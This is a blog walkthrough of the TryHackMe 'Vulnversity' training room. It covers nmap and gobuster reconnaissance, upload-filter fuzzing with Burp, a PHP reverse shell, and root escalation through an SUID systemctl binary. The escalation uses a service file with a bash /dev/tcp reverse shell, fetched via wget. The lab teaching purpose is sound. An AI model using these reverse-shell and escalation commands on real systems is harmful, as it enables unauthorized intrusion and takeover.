T-Plaza, 6th Floor, Thika, Kenya
+254 703 412 771

Linux Privilege Escalation – Walkthrough

Do Your Business, We Secure

Linux Privilege Escalation – Walkthrough

Hello there, welcome to our walkthrough on the “Vulnversity” room from TryHackMe. Here is the link to the room: https://tryhackme.com/room/vulnversity. For this room one can opt to use the attack box which is straightforward, you could also opt to use OpenVPn, in case you are not familiar with how connect via OpenVPN, please visit https://tryhackme.com/room/openvpn.

What is expected of the Room?

The room falls under the basic computer exploitation classification on try Hack me. It’s a room meant to equip one with skills needed for active reconnaissance, performing basic web application attacks and most especially privilege escalation.

[Task 1] Machine Deployment

We will use this machine to perform our attacks for the given tasks.

.  .  .

[Task 2] Reconnaissance

We need to gather information on the attack machine, what is a better place begin than a Nmap scan on the specified box? (your machine IP being the one provided by the room)

(# 1) Run an Nmap scan with the arguments given above and count the number of open ports.

Nmap – Service Discovery
nmap -sV -T4 <machine ip> 
  • -sV = runs a scan for service versions
  • -T4= It is a timing argument

(# 2) Check the version of squid proxy running and submit your answer.

Squid Proxy Version
nmap -sV  <machine ip> 

(# 3) Running the -p-400 command simply tells Nmap how many ports it should scan. For more information on this, you can check the Nmap manual.

-p- Nmap tag
man nmap

(# 4) We can also use the same command as above to find out what -n tag does not resolve.

-n Nmap tag

(# 5) From the earlier Nmap scan, we can simply identify the operating system, but we could also use the tag -O to get the operating system running.

Operating system running

(# 6)Ensure that you know what web servers are and the ones that are used in order to answer this question To get the port that the web server is running on, we can simply check the results for our first Nmap scan.

Web Server

[Task 3] Locating directories using Go Buster

Now we are going to use go buster which is a directory discovery tool that will find hidden directories. Go buster is pre-installed in kali but in case it is not, you can installation by using the command sudo apt-get install gobuster or sudo apt install gobuster depending with your kali version. For kali, wordlists are normally located under /usr/share/ folder.

Directory Listing

In order to list the directory with the upload form page we need to run the gobuster command listed below

gobuster dir -u http://<machine IP>:3333 -w <wordlist path>

In order to confirm if we have the right directory, we can load our folder path on the browser, the result should be as follows:

Upload Form

. . .

[Task 4] Compromising Web Server

Now that we have found the upload form, we can move to the next task which is to compromise the server

(#1 ) We are required to test which files extensions can be uploaded example .txt, .HTML, .md, .php and others to find the one that cannot be uploaded. This is called fuzzing.

(#2 ) Create a list with the file extensions given to in the room. This can be done in three easy steps:

extension file

Touch <file_name>This creates the file

echo ‘<content> ‘> <file_name> -These writes to the file

cat <file_name> This reads the file

We are going to use intruder to automate customized attacks. Go to the proxy tab on burp and make sure it is configured to intercept your browser traffic.

Intercept traffic from the form once you upload a file, right click and send it to intruder, click on payloads and select load, choose the file you saved your extensions.

Set payload

Click the position tap find the filename and “Add §” to the extension as seen below.

Adding the extension

Ensure that the attack type is snipper and click on start attack.

Attack Type

(#1 ) Now that we know which extension our payload can use, we are going to create a reverse shell.

  • Download the reverse php shell here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
  • Edit the downloaded file i.e the ip to be the one provided in the link given (your tun0 ip) , and the port number if you wish it. In this case, we will just use the port number 1234
  • Rename the file to <file_name>.phtml
  • Listen to incoming connections using netcat with command nc -lvnp <your_port>
  • Upload the shell and navigate to http://<ip>:3333/internal/uploads/<file_name>.phtml  that will execute your payload.
  • you should see a shell on your netcat session
Start listener

(# 2) To find who manages the server, we will list all users.

List all users
cat /etc/passwd

(# 3) In order to get the first flag, we need to go to the directory for the user bill.

  • cd /home/bill -To get to bill’s folder
  • ls – List files and folders under the user
  • cat <file_name.txt> – Read the file to get flag
First flag

. . .

[Task 5] Privilege Escalation

Since we have the system user, we are now going to escalate our privileges in order to become the root user.

SUID is a file permission that allows a user to to run a file/program temporarily with the owners permission.

(# 1) We are expected to search for SUID files and see what stands out

find / -perm /4000 2> /dev/null
SUID files

We realize there is a /bin/systemctl which is interesting not only because runs services but also because in this case it an be run by any user.

(# 2 )  So as to get the final flag, we need to escalate our privileges to become root. To do this, we are going to create a ‘.sevice file’ that when run will create a shell to the root.

  • First off we need to create a file with the extension ‘.service’ eg file.service and copy the following to it. This code creates a service that activates a port which then allows us to listen in on the service thus creating a reverse shell
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<your_tun0_ip>/4455 0>&1'
  • Since we cannot copy this directly to our existing reverse shell we need to host it from our local machine by simply using  python3 -m http.sever <port_no> command.
Python server
  • We then download it from the existing shell. If we try it out where we are presently which is /home/bill we will get an error so we will need to cd /tmp then download it from there. This is because /tmp folder stores temporary files and nobody really pays attention to it.
Download .service file
wget http://<ip_add>:<port>/<file_name>.service
  • Once this runs successfully, we will then have to enable the service before we can run  it (p.s) if we run systemctl enable <file_name>.service  it will give us an error so we have to use.
systemctl enable /tmp/<file_name>.service
Enable service
  • We now need to create a listener using the same port number that we used inside the ‘.service’ file.
Start Listener
  • Once the listener is up, we can then start the service.
Systemctl start <file_name>.service
Start the service
  • This will create a reverse shell on our listener as shown below.
Reverse shell created

Whoohoo!! We are now root, now we just need to find our second flag.

Cd to the home file and list all to see what is there. We need to read the root.txt file and sure enough it is our second flag.

Second flag

. . .

What is hacking without having a bit of fun? Do you think we can change the password for the root user? There is only one way to find out go ahead and try it.

Change Password

Hehe, that was relatively easy, now you try and change bills password. We hope you learnt something new and had fun doing it until next time adios!!

Tags: , , ,

Leave a Reply

Your email address will not be published. Required fields are marked *


Powered by WhatsApp Chat

× WhatsApp Us...